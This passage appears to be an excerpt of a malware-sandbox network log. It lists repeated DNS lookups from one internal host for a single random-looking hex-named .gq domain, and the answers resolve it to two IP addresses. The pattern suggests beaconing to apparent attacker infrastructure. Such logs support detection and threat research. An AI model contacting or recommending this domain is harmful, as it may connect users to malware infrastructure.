Oct 14, 2021 08:28:52.281750917 CEST	57574	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:52.300395012 CEST	53	57574	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:53.526912928 CEST	51818	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:53.543016911 CEST	53	51818	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:54.606945038 CEST	56628	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:54.625006914 CEST	53	56628	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:56.038455963 CEST	60778	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:56.054569006 CEST	53	60778	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:57.478297949 CEST	54683	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:57.496562958 CEST	53	54683	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:58.838350058 CEST	59329	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:58.857067108 CEST	53	59329	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:00.261539936 CEST	64021	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:00.278069973 CEST	53	64021	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:01.621984959 CEST	56129	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:01.640744925 CEST	53	56129	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:03.038508892 CEST	58177	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:03.056396961 CEST	53	58177	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:06.114991903 CEST	50700	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:06.133622885 CEST	53	50700	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:07.492008924 CEST	54069	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:07.510478020 CEST	53	54069	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:08.682867050 CEST	61178	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:08.701395035 CEST	53	61178	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:09.870501995 CEST	50243	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:09.889010906 CEST	53	50243	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:11.079993010 CEST	55066	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:11.098392010 CEST	53	55066	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:12.308362961 CEST	58454	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:12.326812029 CEST	53	58454	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:13.616075993 CEST	57691	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:13.634321928 CEST	53	57691	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:15.094715118 CEST	59489	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:15.112957954 CEST	53	59489	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:16.619941950 CEST	64022	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:16.638273001 CEST	53	64022	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:17.969158888 CEST	60023	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:17.987740993 CEST	53	60023	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:20.357798100 CEST	57193	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:20.374650002 CEST	53	57193	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:21.776597023 CEST	64413	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:21.795156002 CEST	53	64413	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:23.380697966 CEST	60429	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:23.396900892 CEST	53	60429	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:27.428143978 CEST	60345	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:27.445975065 CEST	53	60345	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:29.608062983 CEST	58730	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:29.624861002 CEST	53	58730	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:31.696376085 CEST	53830	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:31.713087082 CEST	53	53830	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:32.966362000 CEST	57226	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:32.984905005 CEST	53	57226	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:35.225338936 CEST	57880	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:35.243751049 CEST	53	57880	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:36.929517031 CEST	60850	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:36.947783947 CEST	53	60850	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:38.099759102 CEST	55830	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:38.117574930 CEST	53	55830	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:39.331229925 CEST	55145	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:39.349596024 CEST	53	55145	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:40.663470984 CEST	64091	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:40.681256056 CEST	53	64091	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:41.832782984 CEST	55728	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:41.851002932 CEST	53	55728	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:43.238637924 CEST	55694	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:43.256962061 CEST	53	55694	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:44.388569117 CEST	53926	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:44.406697989 CEST	53	53926	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:45.724782944 CEST	65531	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:45.741152048 CEST	53	65531	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:46.881611109 CEST	65437	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:46.900079012 CEST	53	65437	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:48.011307001 CEST	54590	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:48.029814005 CEST	53	54590	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:49.280458927 CEST	51318	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:49.299062967 CEST	53	51318	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:51.840734005 CEST	58474	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:51.858999968 CEST	53	58474	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:55.796895981 CEST	59092	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:55.815201998 CEST	53	59092	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:56.924676895 CEST	57483	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:56.942806959 CEST	53	57483	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:58.030971050 CEST	53830	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:58.047533989 CEST	53	53830	8.8.8.8	192.168.2.6
Oct 14, 2021 08:29:59.187026978 CEST	49809	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:29:59.205523968 CEST	53	49809	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:00.267366886 CEST	52814	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:00.285648108 CEST	53	52814	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:01.374663115 CEST	51069	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:01.393187046 CEST	53	51069	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:02.507575035 CEST	56526	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:02.525789976 CEST	53	56526	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:03.656306028 CEST	50512	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:03.674351931 CEST	53	50512	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:04.837879896 CEST	51679	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:04.856111050 CEST	53	51679	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:05.918864965 CEST	56071	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:05.935167074 CEST	53	56071	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:07.100869894 CEST	58950	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:07.119254112 CEST	53	58950	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:08.397211075 CEST	57035	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:08.415246964 CEST	53	57035	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:09.653837919 CEST	54122	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:09.670599937 CEST	53	54122	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:11.092576981 CEST	56759	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:11.109034061 CEST	53	56759	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:12.873286009 CEST	59220	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:12.891690969 CEST	53	59220	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:15.296228886 CEST	62211	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:15.314672947 CEST	53	62211	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:16.637487888 CEST	62033	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:16.658160925 CEST	53	62033	8.8.8.8	192.168.2.6
Oct 14, 2021 08:30:18.273524046 CEST	61244	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:30:18.291595936 CEST	53	61244	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 14, 2021 08:28:18.981506109 CEST	192.168.2.6	8.8.8.8	0x9641	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:20.304617882 CEST	192.168.2.6	8.8.8.8	0xcfd3	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:21.290359974 CEST	192.168.2.6	8.8.8.8	0x66b6	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:22.530085087 CEST	192.168.2.6	8.8.8.8	0x7b38	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:23.741621971 CEST	192.168.2.6	8.8.8.8	0x65d8	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:24.836807966 CEST	192.168.2.6	8.8.8.8	0xc6ba	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:25.974273920 CEST	192.168.2.6	8.8.8.8	0xa520	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:27.298286915 CEST	192.168.2.6	8.8.8.8	0x111e	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:30.236521959 CEST	192.168.2.6	8.8.8.8	0x868	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:31.345115900 CEST	192.168.2.6	8.8.8.8	0xe6ee	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:32.470803976 CEST	192.168.2.6	8.8.8.8	0x3d76	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:33.632031918 CEST	192.168.2.6	8.8.8.8	0x69a5	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:34.851088047 CEST	192.168.2.6	8.8.8.8	0x38b	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:35.953857899 CEST	192.168.2.6	8.8.8.8	0xc4a	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:37.063189983 CEST	192.168.2.6	8.8.8.8	0x7d39	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:38.346430063 CEST	192.168.2.6	8.8.8.8	0xe711	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:39.473190069 CEST	192.168.2.6	8.8.8.8	0x25ef	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:41.046897888 CEST	192.168.2.6	8.8.8.8	0x4f40	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:42.234715939 CEST	192.168.2.6	8.8.8.8	0x6b50	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:43.827435970 CEST	192.168.2.6	8.8.8.8	0xcc8c	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:45.159775019 CEST	192.168.2.6	8.8.8.8	0xae8b	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:48.000888109 CEST	192.168.2.6	8.8.8.8	0xd0fe	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:49.619648933 CEST	192.168.2.6	8.8.8.8	0x1cfe	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:50.931046009 CEST	192.168.2.6	8.8.8.8	0x2f14	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:52.281750917 CEST	192.168.2.6	8.8.8.8	0x9b51	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:53.526912928 CEST	192.168.2.6	8.8.8.8	0x9b5c	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:54.606945038 CEST	192.168.2.6	8.8.8.8	0xfaf	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:56.038455963 CEST	192.168.2.6	8.8.8.8	0xc5d7	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:57.478297949 CEST	192.168.2.6	8.8.8.8	0x7539	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:58.838350058 CEST	192.168.2.6	8.8.8.8	0xcc85	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:00.261539936 CEST	192.168.2.6	8.8.8.8	0xca48	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:01.621984959 CEST	192.168.2.6	8.8.8.8	0x41fe	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:03.038508892 CEST	192.168.2.6	8.8.8.8	0x76cb	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:06.114991903 CEST	192.168.2.6	8.8.8.8	0xe495	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:07.492008924 CEST	192.168.2.6	8.8.8.8	0xc716	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:08.682867050 CEST	192.168.2.6	8.8.8.8	0x56ca	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:09.870501995 CEST	192.168.2.6	8.8.8.8	0xad00	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:11.079993010 CEST	192.168.2.6	8.8.8.8	0xfca0	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:12.308362961 CEST	192.168.2.6	8.8.8.8	0xce7c	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:13.616075993 CEST	192.168.2.6	8.8.8.8	0xb217	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:15.094715118 CEST	192.168.2.6	8.8.8.8	0x1e24	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:16.619941950 CEST	192.168.2.6	8.8.8.8	0xce2a	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:17.969158888 CEST	192.168.2.6	8.8.8.8	0xf846	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:20.357798100 CEST	192.168.2.6	8.8.8.8	0xfa06	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:21.776597023 CEST	192.168.2.6	8.8.8.8	0xc8c9	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:23.380697966 CEST	192.168.2.6	8.8.8.8	0x4036	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:27.428143978 CEST	192.168.2.6	8.8.8.8	0x9f87	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:29.608062983 CEST	192.168.2.6	8.8.8.8	0xf256	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:31.696376085 CEST	192.168.2.6	8.8.8.8	0xb97a	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:32.966362000 CEST	192.168.2.6	8.8.8.8	0xe4c9	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:35.225338936 CEST	192.168.2.6	8.8.8.8	0x3787	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:36.929517031 CEST	192.168.2.6	8.8.8.8	0x493	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:38.099759102 CEST	192.168.2.6	8.8.8.8	0x3e93	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:39.331229925 CEST	192.168.2.6	8.8.8.8	0x6c70	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:40.663470984 CEST	192.168.2.6	8.8.8.8	0x37c8	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:41.832782984 CEST	192.168.2.6	8.8.8.8	0x82b7	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:43.238637924 CEST	192.168.2.6	8.8.8.8	0xed11	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:44.388569117 CEST	192.168.2.6	8.8.8.8	0xcc0d	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:45.724782944 CEST	192.168.2.6	8.8.8.8	0x5ccf	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:46.881611109 CEST	192.168.2.6	8.8.8.8	0x83f	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:48.011307001 CEST	192.168.2.6	8.8.8.8	0x69c5	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:49.280458927 CEST	192.168.2.6	8.8.8.8	0x6449	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:51.840734005 CEST	192.168.2.6	8.8.8.8	0x6899	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:55.796895981 CEST	192.168.2.6	8.8.8.8	0xdfe6	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:56.924676895 CEST	192.168.2.6	8.8.8.8	0xdd17	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:58.030971050 CEST	192.168.2.6	8.8.8.8	0xb23	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:59.187026978 CEST	192.168.2.6	8.8.8.8	0x4332	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:00.267366886 CEST	192.168.2.6	8.8.8.8	0x4e	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:01.374663115 CEST	192.168.2.6	8.8.8.8	0xbb96	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:02.507575035 CEST	192.168.2.6	8.8.8.8	0x9297	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:03.656306028 CEST	192.168.2.6	8.8.8.8	0x202f	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:04.837879896 CEST	192.168.2.6	8.8.8.8	0x89b0	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:05.918864965 CEST	192.168.2.6	8.8.8.8	0xe22d	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:07.100869894 CEST	192.168.2.6	8.8.8.8	0x1524	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:08.397211075 CEST	192.168.2.6	8.8.8.8	0x1ae7	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:09.653837919 CEST	192.168.2.6	8.8.8.8	0xbc15	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:11.092576981 CEST	192.168.2.6	8.8.8.8	0xdd1	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:12.873286009 CEST	192.168.2.6	8.8.8.8	0x11e2	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:15.296228886 CEST	192.168.2.6	8.8.8.8	0x9cc	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:16.637487888 CEST	192.168.2.6	8.8.8.8	0x2770	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:18.273524046 CEST	192.168.2.6	8.8.8.8	0x6e34	Standard query (0)	74f26d34ffff049368a6cff8812f86ee.gq	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 14, 2021 08:28:19.010951996 CEST	8.8.8.8	192.168.2.6	0x9641	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:19.010951996 CEST	8.8.8.8	192.168.2.6	0x9641	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:20.325933933 CEST	8.8.8.8	192.168.2.6	0xcfd3	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:20.325933933 CEST	8.8.8.8	192.168.2.6	0xcfd3	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:21.317846060 CEST	8.8.8.8	192.168.2.6	0x66b6	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:21.317846060 CEST	8.8.8.8	192.168.2.6	0x66b6	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:22.570988894 CEST	8.8.8.8	192.168.2.6	0x7b38	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:22.570988894 CEST	8.8.8.8	192.168.2.6	0x7b38	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:23.760160923 CEST	8.8.8.8	192.168.2.6	0x65d8	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:23.760160923 CEST	8.8.8.8	192.168.2.6	0x65d8	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:24.865097046 CEST	8.8.8.8	192.168.2.6	0xc6ba	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:24.865097046 CEST	8.8.8.8	192.168.2.6	0xc6ba	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:26.003031015 CEST	8.8.8.8	192.168.2.6	0xa520	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:26.003031015 CEST	8.8.8.8	192.168.2.6	0xa520	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:27.316716909 CEST	8.8.8.8	192.168.2.6	0x111e	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:27.316716909 CEST	8.8.8.8	192.168.2.6	0x111e	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:30.266340971 CEST	8.8.8.8	192.168.2.6	0x868	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:30.266340971 CEST	8.8.8.8	192.168.2.6	0x868	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:31.363276005 CEST	8.8.8.8	192.168.2.6	0xe6ee	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:31.363276005 CEST	8.8.8.8	192.168.2.6	0xe6ee	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:32.486987114 CEST	8.8.8.8	192.168.2.6	0x3d76	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
